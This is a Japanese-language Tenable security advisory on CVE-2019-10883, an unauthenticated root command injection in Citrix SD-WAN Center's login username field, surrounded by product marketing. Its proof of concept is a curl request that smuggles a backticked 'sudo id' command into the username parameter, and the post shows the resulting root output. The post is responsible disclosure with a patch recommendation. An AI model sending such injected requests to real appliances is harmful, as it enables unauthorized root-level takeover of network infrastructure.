Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

Citrix SD-WAN CenterのOSに深刻なコマンドインジェクションの脆弱性が発見

Tenable ResearchはCitrix SD-WAN Centerにリモートでコードが実行される可能性がある重大な脆弱性を発見しました。

背景

4月10日、Citrixは 10.2.1より前のCitrix SD-WANセンター10.2.xおよび10.0.7より前のNetScaler SD-WANセンター10.0.xにおけるオペレーティングシステム(OS)コマンドインジェクションの脆弱性(CVE-2019-10883)についてのセキュリティ情報を公開しました。Tenable ResearchはCVE-2017-6316のプラグインを開発中にこの脆弱性を発見し、Citrixに報告しました。

Citrix Netscaler SD-WAN(ソフトウェア定義の広域ネットワーク)を使用すると、企業はネットワークを管理し、仮想WANを作成できます。これらの種類の製品は、支店やリモートデータセンターをサポートし、クラウドベースのアプリケーションの接続性を維持するために使用されます。CitrixのWebサイトによると、Netscaler SD-WANは海運、非営利、ホスピタリティなどの業界で使用されています。

分析

Tenable ResearchはCTX236992を調査している間、このセキュリティ情報に含まれた脆弱性のほとんどが認証を必要とすることを確認しました。私たちは、Nessusプラグインを作成する際、CTX236992の研究者が記事に記載した2つの認証されていないコマンドインジェクションの脆弱性を調べました。 これらの脆弱性は、Citrix SD-WANアプライアンスの脆弱性であるCVE-2017-6316に関連していると考えられます。

CVE-2017-6316の調査により、Citrix SD-WAN Center 10.2.0.136.733315が/home/talariuser/www/app/Controller/UsersController.php にあるコントローラーのユーザー指定データ($ username)の検証が不十分であることが脆弱性の原因であることが判明されました(CVE-2019-10883)。

概念実証

認証されていないリモートの攻撃者はこの脆弱点を悪用して、root権限で任意のコマンドを実行することができます。これは、次のcURLコマンドを実行することによって実現できます。

curl -skv --tlsv1.2 -d '_method=POST&data%5BUser%5D%5Busername%5D=%60sudo%20id%20>/tmp/test%60&data%5BUser%5D%5Bpassword%5D=my_password&data%5BUser%5D%5BsecPassword%5D=my_secPassword' 'https://[target_host]/login'

このコマンドを実行した結果の出力は次のとおりです。

[email protected]:/home/talariuser/www/app/Controller# cat /tmp/test

uid=0(root) gid=0(root) groups=0(root)

ベンダー応答

Tenable Researchは2月上旬にCitrixに報告し、2月末までに脆弱性が再現されたことを確認しました。Citrixは4月10日、この脆弱性に関するセキュリティ情報を公開しました。

解決策

ユーザーはCitrix SD-WAN Center 10.2.1以降およびNetScaler SD-WAN Center 10.0.7以降にアップグレードする必要があります。さらに、CitrixはSD-WANセンターのセキュリティを強化するために使用すべきベストプラクティスのリストを提供しました。

詳細情報を入手する

最新のアタックサーフェスを総合的に管理する初のサイバーエクスポージャープラットフォーム、 Tenable.io の詳細情報をご覧ください。

今すぐ Tenable.io Vulnerability Management の60日間無料トライアルをお試しください。

Tenableブログを購読する

購読する
無料でお試し 今すぐ購入

Tenable.ioを試す

30 日間無料

最新のクラウドベースの脆弱性管理プラットフォームの全機能にアクセスし、これまでにない精度で全ての資産を確認し、追跡しましょう。 今すぐサインアップしてください。

Tenable.ioを購入する

最新のクラウドベースの脆弱性管理プラットフォームの全機能にアクセスし、これまでにない精度で全ての資産を確認し、追跡しましょう。 年間サブスクリプションをご購入ください。

65 資産

2,275ドル

今すぐ購入

無料でお試し 今すぐ購入

Nessus Professionalを無料で試す

7日間無料

Nessus®は、最も包括的な脆弱性スキャナです。Nessus Professionalは脆弱性のスキャンプロセスを自動化し、コンプライアンスサイクルを短縮し、お客様がITチームに専念できるようにサポートします。

Nessus Professionalを購入する

Nessus®は、最も包括的な脆弱性スキャナです。Nessus Professionalは脆弱性のスキャンプロセスを自動化し、コンプライアンスサイクルを短縮し、お客様がITチームに専念できるようにサポートします。

複数年ライセンスをご購入いただくと割引が適用されます。拡張サポートを追加していただくと、電話、メール、コミュニティ、チャットサポートを年中いつでもご利用いただけきます。詳細についてはこちらを参照してください。

無料でお試し 今すぐ購入

Tenable.io Web Application Scanningを試す

30 日間無料

Tenable.ioプラットフォームの一部として最新のアプリケーション用に設計された、最新のWebアプリケーションのスキャンサービスの全機能にアクセス可能です。手作業による労力や重大なWebアプリケーションの中断なしに、脆弱性のオンラインポートフォリオを安全に高精度でスキャンします。 今すぐサインアップしてください。

Tenable.io Web Application Scanningを購入する

最新のクラウドベースの脆弱性管理プラットフォームの全機能にアクセスし、これまでにない精度で全ての資産を確認し、追跡しましょう。 年間サブスクリプションをご購入ください。

5 FQDNs

3,578ドル

今すぐ購入

無料でお試しください セールスにご連絡ください

Tenable.io Container Securityを試す

30 日間無料

脆弱性管理プラットフォームに統合された唯一のコンテナセキュリティ製品の全機能にアクセス可能です。コンテナイメージの脆弱性、マルウェア、ポリシー違反を監視継続的インテグレーション/継続的デリバリー(CI / CD)システムと統合し、DevOpsプラクティス、セキュリティ強化、および企業のポリシーコンプライアンスをサポート

Tenable.io Container Securityを購入する

Tenable.ioのContainer Securityは、ビルドプロセスと統合することにより、コンテナイメージのセキュリティ(脆弱性、マルウェア、ポリシー違反など)を可視化し、シームレスかつ安全なDevOpsプロセスを実現します。

Industrial Securityについてもっと知る

Tenable.scのデモを入手する

以下のフォームに連絡先をご記入ください。営業担当者からデモのスケジュールについてご連絡いたします。短いコメントもご記入いただけます(255文字まで)。アスタリスク(*)マークの付いた欄は必須です。

無料でお試しください セールスにご連絡ください

Tenable Luminを試す

30 日間無料

Tenable Luminを使用して、Cyber Exposureを可視化および調査し、リスクの軽減を追跡し、競合他社に対してベンチマークしましょう。

Tenable Luminを購入する

Tenableの担当者にお問い合わせいただき、組織全体に対するインサイトを得て、サイバーリスクを管理する上でLuminがいかに役立つかについて、Tenableの営業担当者までお問い合わせください。

Indegyについての詳細を見る